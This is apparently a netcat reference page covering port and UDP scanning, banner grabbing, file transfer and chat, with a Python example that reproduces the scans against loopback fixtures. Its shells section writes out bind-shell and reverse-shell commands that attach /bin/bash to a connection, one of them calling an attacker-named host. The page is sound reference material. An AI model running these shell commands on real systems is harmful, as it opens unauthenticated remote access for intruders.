Netcat
Netcat, or nc, is a versatile command-line utility for reading from and writing to TCP and UDP connections. This page covers its use for port scanning, banner grabbing, shells, and file transfer. Several implementations exist (traditional/GNU netcat, OpenBSD nc, and Nmap's ncat) and their option sets differ: the -e option is missing from OpenBSD nc, and OpenBSD nc takes the listen port as a positional argument (nc -l 1234), so whether the -l -p form used below is accepted depends on the build installed on the system.
Basic TCP Port Scan:
nc -zv [hostname] [start-port]-[end-port]
Conducts a TCP connect scan of the port range on the given host: -z completes the TCP handshake without sending data and -v reports each port that accepted the connection. Because the handshake completes, the target logs these connections like any other; add -w with a short timeout to avoid hanging on filtered ports.
UDP Port Scan:
nc -uzv [hostname] [start-port]-[end-port]
Sends an empty UDP datagram to each port in the range. A port is reported closed only when an ICMP port-unreachable message comes back; silence is reported as open, so a port behind a firewall that drops ICMP looks the same as a listening one. Treat UDP results as "open or filtered" rather than open.
Banner Grabbing:
Retrieve Service Banner:
nc -v [hostname] [port]
Connects to the specified port and prints whatever the service sends first, which identifies the software for protocols where the server speaks first (SSH, SMTP, FTP, POP3). For client-speaks-first protocols such as HTTP nothing appears until you type a request, so an empty result does not mean there is no service.
TCP Connection Test:
Full TCP Connection Test:
nc -v [hostname] [port]
The same command doubles as a connectivity test: -v prints whether the connection succeeded, was refused (closed port), or timed out (filtered), which is a quicker check than a full scan when a single port is in question.
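The three probes above (the zero-I/O scan, the banner read, and the UDP check) as an added worked example. This is not code from the page or from any netcat implementation: it reimplements in Python what nc does on the wire so it runs offline against constructed loopback fixtures (a tiny TCP service that sends a made-up SSH-style banner, a UDP socket that is bound but never answers). The port numbers are whatever the kernel hands out, the banner string is invented, and the UDP check assumes Linux-style behaviour where an ICMP port-unreachable surfaces as ECONNREFUSED on a connected UDP socket. It also shows the UDP failure mode directly: a silent open port and a filtered port produce the same verdict.

```python
import socket
import socketserver
import threading

# Constructed banner for the loopback fixture; not from any real host.
BANNER = b"SSH-2.0-ExampleServer_1.0\r\n"


class _BannerHandler(socketserver.BaseRequestHandler):
    """Server-speaks-first service: send the banner, then hang up."""
    def handle(self):
        self.request.sendall(BANNER)


def start_banner_service():
    """Start the fixture TCP service on an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _BannerHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def free_port(kind=socket.SOCK_STREAM):
    """Ask the kernel for an unused loopback port and release it, so it is closed."""
    with socket.socket(socket.AF_INET, kind) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def tcp_connect_scan(host, ports, timeout=0.5):
    """What `nc -zv host start-end` does: complete the TCP handshake on each
    port, send nothing, close. Returns the ports that accepted the connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 = handshake completed
                open_ports.append(port)
    return open_ports


def grab_banner(host, port, timeout=1.0, max_bytes=256):
    """What `nc -v host port` shows for a server-speaks-first protocol: connect
    and read whatever the service volunteers. Empty bytes means the service
    expects the client to talk first (HTTP), not that nothing is listening."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(max_bytes)
        except socket.timeout:
            return b""


def udp_probe(host, port, timeout=0.5):
    """What `nc -uz` measures. A UDP port is only provably closed when an ICMP
    port-unreachable comes back (delivered as ECONNREFUSED on a connected UDP
    socket). No reply means 'open|filtered': a listener that stays quiet and a
    firewall that drops ICMP look identical, which is why -u scans are unreliable."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))   # connect() so ICMP errors are mapped back to this socket
        s.send(b"\x00")
        try:
            s.recv(1)
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"


def demo():
    """Run all three probes against the constructed fixtures; returns a summary dict."""
    srv, open_tcp = start_banner_service()
    closed_tcp = free_port()
    udp_listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_listener.bind(("127.0.0.1", 0))          # bound and silent: a real listener that never answers
    open_udp = udp_listener.getsockname()[1]
    closed_udp = free_port(socket.SOCK_DGRAM)
    try:
        return {
            "open_tcp_port": open_tcp,
            "tcp_open": tcp_connect_scan("127.0.0.1", [closed_tcp, open_tcp]),
            "banner": grab_banner("127.0.0.1", open_tcp),
            "udp_open": udp_probe("127.0.0.1", open_udp),      # listening, but indistinguishable from filtered
            "udp_closed": udp_probe("127.0.0.1", closed_udp),  # ICMP unreachable arrives: provably closed
        }
    finally:
        udp_listener.close()
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The point of the UDP half is in the last two dictionary entries: the bound-but-silent port comes back as "open|filtered", the same verdict a firewalled port would get, while only the closed port gets a definite answer. That is the behaviour behind the note on -u in the option summary.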
Bind Shell and Reverse Shell:
Bind Shell (Listener on the target):
nc -l -p [port] -e /bin/bash
Listens on the target and hands a shell to whoever connects. Despite the common mislabelling, this is a bind shell, not a reverse shell: the shell is exposed on a listening port of the target, so it only works when inbound connections to that port are allowed. -e requires a netcat built with it (traditional netcat compiled with GAPING_SECURITY_HOLE, or ncat); OpenBSD nc has no -e.
Connect to Bind Shell (Attacker):
nc [target-hostname] [port]
Connects to the listener and receives the shell.
Reverse Shell (Attacker listens):
nc -l -p [port] -v
Reverse Shell (Target connects back):
nc [attacker-hostname] [port] -e /bin/bash
Here the direction is reversed: the target opens an outbound connection to the attacker's listener and attaches the shell to it, which is what gets through NAT and inbound-only firewall rules. In both cases the session is unauthenticated and unencrypted, and the shell has no TTY until one is spawned inside it.
File Transfer:
Receive File (TCP):
nc -l -p [port] > [output-file]
Listens on the port and writes everything received to the file. Depending on the implementation the listener may not exit when the sender closes its end; with traditional netcat use -q 1 on the sender, with OpenBSD nc use -N, and otherwise stop it with Ctrl-C once the transfer is done.
Send File (TCP):
nc [receiver-hostname] [port] < [input-file]
Connects to the listener and streams the file to it. Nothing on the wire authenticates the peer or protects the content, so compare a checksum (for example sha256sum on both sides) after the transfer and use this only on networks where plaintext transfer is acceptable.
Chat Mode (Two-way Communication):
Initiate Chat Mode (TCP):
nc -l -p [port]      # on one terminal (listener)
nc [hostname] [port] # on another terminal (client)
Enables a simple chat mode: each line typed on either terminal is sent, in plaintext, to the other over the TCP connection.
Summary:
Usage: nc [options] [hostname] [port]
Options:
-l: Listen mode, for inbound connections
-p port: Specify the source port to use (also the listen port with -l in traditional netcat and ncat)
-e command: Execute command after connect (not available in OpenBSD nc)
-s addr: Local source address
-v: Verbose
-w timeout: Connect timeout in seconds
-z: Zero-I/O mode (scanning: connects but sends no data)
-u: UDP mode (unreliable for scanning, since a port is only reported closed on an ICMP port-unreachable reply, which many firewalls drop)
-o file: Hex dump of traffic to file
Examples:
nc -l -p 1234: Listen on port 1234 for incoming connections
nc -l -p 1234 -e /bin/bash: Listen on port 1234 and execute /bin/bash on an incoming connection (bind shell)
nc -v -z example.com 80-100: Perform a verbose TCP connect scan of example.com on ports 80 to 100